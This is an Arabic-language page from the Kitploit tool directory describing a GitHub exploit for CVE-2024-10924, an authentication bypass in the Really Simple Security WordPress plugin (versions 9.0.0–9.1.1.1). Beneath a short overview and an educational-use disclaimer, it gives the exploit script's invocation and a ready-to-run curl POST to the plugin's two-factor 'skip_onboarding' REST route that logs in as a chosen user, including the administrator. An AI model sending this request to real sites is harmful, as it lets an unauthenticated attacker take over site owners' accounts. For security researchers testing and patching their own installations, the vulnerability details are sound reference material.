Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10924 — استغلال لـ CVE-2024-10924، وهو تجاوز مصادقة حرج في إضافة Really Simple Security لـ WordPress (الإصدارات 9.0.0-9.1.1.1). يسمح للمهاجمين غير المصادق عليهم بتسجيل الدخول كأي مستخدم عبر خلل في واجهة برمجة تطبيقات المصادقة الثنائية. | Kitploit
أدوات/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

استغلال لـ CVE-2024-10924، وهو تجاوز مصادقة حرج في إضافة Really Simple Security لـ WordPress (الإصدارات 9.0.0-9.1.1.1). يسمح للمهاجمين غير المصادق عليهم بتسجيل الدخول كأي مستخدم عبر خلل في واجهة برمجة تطبيقات المصادقة الثنائية.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال لـ CVE-2024-10924 (إضافة Really Simple Security لووردبريس - تجاوز المصادقة)

📌 نظرة عامة

CVE-2024-10924 هي ثغرة أمنية حرجة لتجاوز المصادقة في إضافة Really Simple Security لنظام ووردبريس (الإصدارات 9.0.0 إلى 9.1.1.1). تسمح هذه الثغرة للمهاجمين غير الموثقين بتسجيل الدخول كأي مستخدم (بما في ذلك المسؤول) من خلال استغلال عيب في واجهة برمجة تطبيقات المصادقة الثنائية (2FA).

معرف CVE: CVE-2024-10924

الخطورة: 🔥 حرجة (CVSS 9.8)

الإصدارات المتأثرة: Really Simple Security 9.0.0 – 9.1.1.1

الإصدار المصحح: 9.1.2

نوع الاستغلال: تجاوز المصادقة

⚠️ إخلاء المسؤولية

🚨 هذا الاستغلال لأغراض تعليمية وبحثية أمنية فقط.

الاستخدام غير المصرح به على أنظمة لا تملكها غير قانوني. الهدف هو مساعدة محترفي الأمن في اختبار الأنظمة الضعيفة وتصحيحها.

🔧 المتطلبات

موقع ووردبريس يعمل بإصدار ضعيف من إضافة Really Simple Security. تثبيت Python 3.x أو cURL للاختبار. اسم مستخدم المشرف المستهدف لووردبريس (قد يكون تعداد المستخدمين مطلوبًا).

تشغيل السكريبت:

python3 exploit.py <url example : http://target.com> <user_id>

يدويًا باستخدام Curl

root@kitploit:~
curl --request POST  "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}'  -v
تنزيل الأداة